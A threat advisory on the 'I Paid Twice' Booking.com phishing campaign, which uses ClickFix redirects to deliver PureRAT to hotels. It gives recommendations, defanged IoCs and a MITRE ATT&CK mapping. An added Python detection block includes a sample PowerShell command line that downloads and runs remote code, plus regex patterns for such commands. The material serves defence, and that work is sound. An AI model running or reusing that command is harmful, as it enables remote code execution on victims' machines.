
I Paid Twice: Inside the Booking.com Phishing Fraud

Amber | Attack Report

Booking.com Phishing Campaign: I Paid Twice Hospitality Industry Attack Report

Summary

A sophisticated phishing campaign has been targeting the global hospitality industry through compromised Booking.com and WhatsApp communications. This Booking.com phishing attack was discovered in April 2025 and involves the PureRAT malware, creating significant security risks for hotels and guests worldwide. The phishing campaign leverages stolen credentials and real reservation data to create highly convincing fraudulent messages that trick victims into revealing sensitive financial information. Attackers utilize the ClickFix redirection system to deploy PureRAT malware, granting remote access to hotel systems and customer data. This hospitality phishing fraud has evolved into a professionalized cybercrime ecosystem where stolen Booking.com accounts are actively traded for large-scale financial fraud operations.

Attack Details

The Booking.com phishing campaign represents a highly sophisticated threat to the hospitality industry, employing multiple attack vectors and advanced social engineering techniques. The phishing operation begins with credential theft through information-stealing malware that infiltrates hotel management systems, harvesting login credentials for booking platforms including Booking.com and Expedia. These stolen hospitality credentials are subsequently sold on cybercrime forums or directly weaponized for fraudulent email campaigns targeting both hotel staff and guests.

The attack methodology centers on malicious emails crafted to impersonate legitimate Booking.com communications, sent to hotel administrative and reservation personnel. These phishing emails contain links that trigger the ClickFix redirection mechanism, which socially engineers recipients into compromising their own machines. Once hotel systems are infected with PureRAT, attackers take control of the hotel's Booking.com extranet account and use it to send authentic-looking banking phishing messages to the hotel's guests. Guests are led to believe a billing discrepancy exists and end up paying twice for the same reservation, which is the origin of the report's title, “I Paid Twice.”

The ClickFix infrastructure uses URLs that follow a predictable pattern and redirect users through a chain of web pages by means of JavaScript and HTML meta tags. These redirects bypass iframe protections and ultimately land victims on sites impersonating Booking.com, complete with fake reCAPTCHA verification prompts that conceal the PowerShell command the victim is induced to run. The phishing infrastructure shares a common IP address that hosts numerous other domains, including pornographic and fake websites, suggesting the attackers operate a Traffic Distribution System (TDS) to manage redirections and obscure their operational infrastructure.

Once the PowerShell command runs, it downloads additional scripts that perform system reconnaissance and fetch a ZIP archive from compromised legitimate websites. The archive contains binaries that use DLL side-loading to load PureRAT directly into memory. PureRAT establishes persistence through Windows registry modifications and maintains encrypted communications with its Command-and-Control (C2) servers. Its modular architecture supports remote command execution, exfiltration of sensitive data, remote control of the user interface, and surveillance through webcam and microphone capture, all without leaving obvious disk-based forensic traces.

This Booking.com phishing operation illuminates a thriving cybercrime ecosystem specifically targeting the hospitality sector. Compromised Booking.com extranet credentials have become valuable commodities traded through Russian-speaking forums and Telegram bots. Organized cybercriminal groups called “traffers” distribute hospitality malware at scale through profit-sharing arrangements, while specialized “log checkers” authenticate stolen credentials before sale. This professionalized underground market enables large-scale hospitality fraud affecting both hotel properties and their guests globally.

Recommendations

Verify Before You Click: Hotel staff and guests must exercise extreme caution with email communications appearing to originate from Booking.com or trusted hospitality brands. Always verify sender email addresses carefully and scrutinize message content for unusual urgency, unexpected payment requests, or unfamiliar links. If any element appears suspicious, contact Booking.com directly through their official website or mobile application rather than responding to potentially fraudulent messages. This verification step is critical for preventing Booking.com phishing attacks.

Secure Your Booking and Hotel Accounts: Hotel administrators should implement robust security measures for all booking platform accounts by creating strong, unique passwords and enabling multi-factor authentication (MFA) on Booking.com extranet and similar hospitality systems. Regularly audit login activity for suspicious access patterns and immediately revoke access for any unauthorized login attempts. These account security practices significantly reduce hospitality credential theft risks.

Train Staff on Phishing Awareness: Employees handling reservations and payment processing represent primary targets for hospitality phishing campaigns. Conduct regular security awareness training demonstrating how phishing emails appear, identifying red flags indicating fraudulent communications, and establishing procedures for safely reporting suspicious messages. Comprehensive phishing awareness training strengthens organizational defenses against social engineering attacks targeting the hospitality industry.

Monitor Network and PowerShell Activity: IT security teams should implement continuous monitoring for unusual PowerShell executions, unauthorized registry modifications, and processes establishing unexpected network connections. These indicators frequently signal PureRAT malware or similar remote access trojans compromising hotel systems. Advanced endpoint monitoring capabilities enable early detection of hospitality-targeted malware infections.
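To make this monitoring recommendation concrete, here is an added example (not the advisory's or Hive Pro's code) that runs three rules over constructed Sysmon-style endpoint events covering the chain described under Attack Details: a pasted ClickFix PowerShell command, a Run-key persistence write, and an outbound connection to the C2 endpoints listed in the IoCs. The event field names, the sample command line and the file paths are assumptions; only the C2 IP:port values come from the advisory.

```python
import re

C2_ENDPOINTS = {("85.208.84.94", 56001), ("77.83.207.106", 56001)}  # refanged from the advisory's IoCs
C2_PORT = 56001

# Constructed Sysmon-style telemetry (field names, paths and command line are assumptions, not real logs).
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iex(iwr http://lookalike.invalid/p)"'},
    {"type": "RegistrySet", "image": r"C:\Users\frontdesk\AppData\Roaming\svc\host.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Host",
     "value": r"C:\Users\frontdesk\AppData\Roaming\svc\host.exe"},
    {"type": "NetworkConnect", "image": r"C:\Users\frontdesk\AppData\Roaming\svc\host.exe",
     "dst_ip": "85.208.84.94", "dst_port": 56001},
    {"type": "NetworkConnect", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
]

# Flags and cmdlets a pasted ClickFix one-liner typically carries; any two together is suspicious.
CLICKFIX_MARKERS = re.compile(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|\biwr\b|downloadstring", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Downloads)\\", re.I)

def clickfix_powershell(ev):
    """T1204.004 / T1059.001: PowerShell spawned by explorer.exe (the Run dialog a ClickFix
    page tells the victim to open) with hidden-window, encoded or download markers."""
    if (ev["type"] != "ProcessCreate" or not ev["image"].lower().endswith("powershell.exe")
            or not ev.get("parent", "").lower().endswith("explorer.exe")):
        return None
    markers = sum(1 for _ in CLICKFIX_MARKERS.finditer(ev["cmdline"]))
    return f"ClickFix-style PowerShell ({markers} markers): {ev['cmdline']}" if markers >= 2 else None

def run_key_persistence(ev):
    """T1547.001: a Run key that points at a binary in a user-writable directory."""
    if ev["type"] != "RegistrySet" or r"\currentversion\run" not in ev["key"].lower():
        return None
    return f"Run-key persistence to {ev['value']}" if USER_WRITABLE.search(ev["value"]) else None

def c2_beacon(ev):
    """T1071 / T1573: outbound connection to a listed C2 endpoint or to the campaign's C2 port."""
    if ev["type"] != "NetworkConnect":
        return None
    hit = (ev["dst_ip"], ev["dst_port"]) in C2_ENDPOINTS or ev["dst_port"] == C2_PORT
    return f"PureRAT C2 candidate {ev['dst_ip']}:{ev['dst_port']} from {ev['image']}" if hit else None

def detect(events):
    """Apply every rule to every event; return (technique id, message) alerts in event order."""
    rules = (("T1204.004", clickfix_powershell), ("T1547.001", run_key_persistence), ("T1071", c2_beacon))
    return [(tid, msg) for ev in events for tid, rule in rules if (msg := rule(ev))]
```

Running `detect(SAMPLE_EVENTS)` yields one alert per malicious event and none for the benign browser connection; in production the rules would be fed from your SIEM's process, registry and network event streams.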

Enhance Endpoint Protection: Deploy next-generation antivirus (NGAV) and endpoint detection and response (EDR) solutions capable of identifying and blocking sophisticated malware threats. Leverage behavioral analysis and machine learning-based detection technologies to identify suspicious activity patterns characteristic of hospitality phishing campaigns. Robust endpoint protection provides critical defense layers against evolving hospitality cybersecurity threats.

Indicators of Compromise (IoCs)

Malicious URLs Associated with Booking.com Phishing Campaign:

The following URLs have been identified as part of the hospitality phishing infrastructure. These malicious links redirect victims through the ClickFix system to deploy PureRAT malware:


Malicious Domains Used in Hospitality Phishing Operations:

These domains impersonate legitimate Booking.com services and facilitate credential theft:


PureRAT Malware File Hashes (SHA256):

703355e8e93f30df19f7f7b8800bd623f1aee1f020c43a4a1e11e121c53b5dd1

5301f5a3fb8649edb0a5768661d197f872d40cfe7b8252d482827ea27077c1ec

64838e0a3e2711b62c4f0d2db5a26396ac7964e31500dbb8e8b1049495b5d1f3

Command and Control Infrastructure (IP:Port):

85[.]208[.]84[.]94[:]56001

77[.]83[.]207[.]106[:]56001

MITRE ATT&CK TTPs

The Booking.com phishing campaign employs numerous tactics, techniques, and procedures mapped to the MITRE ATT&CK framework:

Resource Development (TA0042): Attackers compromise accounts (T1586) including email accounts (T1586.002) to establish infrastructure for phishing operations.

Initial Access (TA0001): The campaign utilizes phishing (T1566) through spearphishing links (T1566.002) to gain initial access to hospitality systems.

Execution (TA0002): Victims execute malicious code through user execution (T1204) of malicious links (T1204.001) and malicious copy-paste operations (T1204.004). PowerShell (T1059.001) executes malware payloads.

Persistence (TA0003): PureRAT establishes persistence through boot or logon autostart execution (T1547) via registry run keys and startup folder modifications (T1547.001).

Defense Evasion (TA0005): The malware employs hijack execution flow (T1574) through DLL side-loading (T1574.001), obfuscated files or information (T1027), masquerading (T1036), and process injection (T1055) including process hollowing (T1055.012).

Credential Access (TA0006): Attackers steal credentials from password stores (T1555) including password managers (T1555.005) and employ input capture (T1056) through keylogging (T1056.001).

Discovery (TA0007): The malware performs system information discovery (T1082), software discovery (T1518) targeting security software (T1518.001), and process discovery (T1057).

Collection (TA0009): PureRAT captures data from local systems (T1005) and implements screen capture (T1113) capabilities.

Exfiltration (TA0010): Stolen data is exfiltrated over C2 channels (T1041).

Command and Control (TA0011): The malware communicates using application layer protocols (T1071) including web protocols (T1071.001), encrypted channels (T1573), proxies (T1090), and command and scripting interpreters (T1059) including JavaScript (T1059.007).

Additional techniques include impersonation (T1656) of legitimate hospitality services throughout the phishing campaign.

References

Detailed technical analysis of the Booking.com phishing campaign targeting hotels and customers is available from SEKOIA: https://blog.sekoia.io/phishing-campaigns-i-paid-twice-targeting-booking-com-hotels-and-customers/


Threat Advisory Details:

Attack Discovered: April 2025
Threat Level: Amber
Publication Date: November 11, 2025
